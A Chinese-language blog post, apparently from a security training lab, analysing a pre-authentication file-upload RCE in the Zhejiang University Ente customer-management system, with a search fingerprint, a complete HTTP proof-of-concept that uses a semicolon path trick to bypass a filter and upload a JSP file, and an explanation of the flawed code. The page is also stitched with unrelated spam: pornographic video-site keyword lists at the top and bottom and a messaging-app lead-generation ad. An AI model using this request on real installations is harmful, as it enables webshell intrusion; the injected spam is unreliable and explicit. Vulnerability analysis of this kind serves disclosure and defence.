<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      浙大恩特前臺RCE漏洞審計

      指紋:title="歡迎使用浙大恩特客戶資源管理系統(tǒng)"

      本文對該系統(tǒng)公開在互聯(lián)網(wǎng),但未分析代碼細節(jié)的漏洞進行審計分析:

      前臺文件上傳RCE

      該系統(tǒng)2019版本存在權限繞過加文件上傳組合漏洞,可通過上傳webshell實現(xiàn)前臺RCE。

      公開POC:

      POST /entsoft/CustomerAction.entphone;.js?method=loadFile HTTP/1.1Host:
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
      Gecko/20100101 Firefox/112.0 uacqAccept:
      text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language:
      zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:
      gzip, deflateConnection: closeContent-Type: multipart/form-data;
      boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2AContent-Length: 203
      ?
      ------WebKitFormBoundarye8FPHsIAq9JN8j2AContent-Disposition:
      form-data; name="file";filename="as.jsp"Content-Type: image/jpeg
      ?
      <%out.print("test");%>------WebKitFormBoundarye8FPHsIAq9JN8j2A--

      權限繞過部分先看過濾器:

      分析web.xml發(fā)現(xiàn)purfilter為全局過濾器:

      如上,會對/*也就是任意請求進行攔截,跟進源碼:

      首先出現(xiàn)的就是白名單后綴+白名單接口,在后續(xù)校驗中也是對非listExpUrl內(nèi)容的后綴或者接口才會進行權限校驗:

      而攔截器在進行后綴白名單檢測時,獲取后綴的方式如下:

      通過獲取最后一個.的部分作為后綴。

      【----幫助網(wǎng)安學習,以下所有學習資料免費領!加vx:YJ-2021-1,備注 “博客園” 獲取!】

       ① 網(wǎng)安學習成長路徑思維導圖
       ② 60+網(wǎng)安經(jīng)典常用工具包
       ③ 100+SRC漏洞分析報告
       ④ 150+網(wǎng)安攻防實戰(zhàn)技術電子書
       ⑤ 最權威CISSP 認證考試指南+題庫
       ⑥ 超1800頁CTF實戰(zhàn)技巧手冊
       ⑦ 最新網(wǎng)安大廠面試題合集(含答案)
       ⑧ APP客戶端安全檢測指南(安卓+IOS)

      而且該系統(tǒng)是tomcat容器,基于該容器對;的解析特性,不會匹配到;后面的內(nèi)容,也就是在進行路由匹配時,只會匹配到CustomerAction.entphone,從而使得CustomerAction.entphone;.js?method=loadFile順利進入過濾器層面的校驗,并且此時獲取的后綴又是.js,處于白名單后綴,從而實現(xiàn)權限繞過。

      接下來分析:上傳點代碼漏洞原因:

      先在xml文件尋找接口對應后端代碼,該接口匹配后綴.entphone,對應代碼為:enterphone.EntPhoneControl類。

      全局搜索EntPhoneControl類:

      跟進漏洞類CustomerAction:

      跟進method對應loadFile方法:

      要想進入文件上傳邏輯,會先進行gesum參數(shù)的條件判斷:

      在gesum不為空時才進入上傳邏輯,原數(shù)據(jù)包里面是沒有傳gesum參數(shù)的,在java里面,一般值會設置為NULL,而NULL不等于空,則能夠順利進入if邏輯。

      進入if塊后,代碼會繼續(xù)執(zhí)行以下步驟:

      創(chuàng)建CustomerBean并設置gesnum(此時gesnum為null)和tenantID。

      調(diào)用customerBean.checkGesnum()檢查客戶代碼是否存在。

      這一步是關鍵:若checkGesnum()方法在gesnum為null時返回false(即認為"客戶代碼不存在",符合業(yè)務邏輯,因為null通常不是有效的客戶代碼),則會進入else分支,執(zhí)行文件上傳邏輯。

      隨后通過如上文件獲取文件名,并直接進行文件上傳,由于未進行后綴校驗,從而可上傳jsp文件,造成RCE漏洞。

      本地環(huán)境漏洞復現(xiàn):

      上傳成功,并成功解析:

      更多網(wǎng)安技能的在線實操練習,請點擊這里>>

      posted @ 2025-10-15 17:22  蟻景網(wǎng)安實驗室  閱讀(14)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 苍井空浴缸大战猛男120分钟| 乌克兰丰满女人a级毛片右手影院| 国产精品午夜福利视频| 2021国产精品视频网站| 国产精品一区在线蜜臀| 精品无码一区二区三区电影| 91香蕉国产亚洲一二三区| 国产精品一区在线蜜臀| 国产精品久久久久久人妻精品动漫 | 日韩中文字幕有码av| 性色在线视频精品| 久久精品国产91精品亚洲| 国产精品一区二区在线蜜芽tv| 337p粉嫩大胆噜噜噜| 亚洲美女av一区二区| 白丝乳交内射一二三区| 日韩有码中文字幕国产| 国产精品三级黄色小视频| 黑人av无码一区| 中文国产日韩欧美二视频| 久久精品一区二区三区中文字幕| 男人的天堂av社区在线| 精品三级在线| 窝窝午夜色视频国产精品破 | 亚洲岛国成人免费av| 中文字幕无码精品亚洲35| 高清一区二区三区不卡视频| 亚洲欧美国产日韩天堂区| 成人又黄又爽又色的视频| 久久久久影院色老大2020| 最近中文字幕完整版| 男女xx00上下抽搐动态图| 日本乱码在线看亚洲乱码| 久久天天躁夜夜躁狠狠85| 久久精品日日躁夜夜躁| 国产精品粉嫩嫩在线观看| 久久天天躁夜夜躁狠狠85| 北条麻妃42部无码电影| 欧美人成精品网站播放| 在线 欧美 中文 亚洲 精品| 精品国产一区二区三区国产区|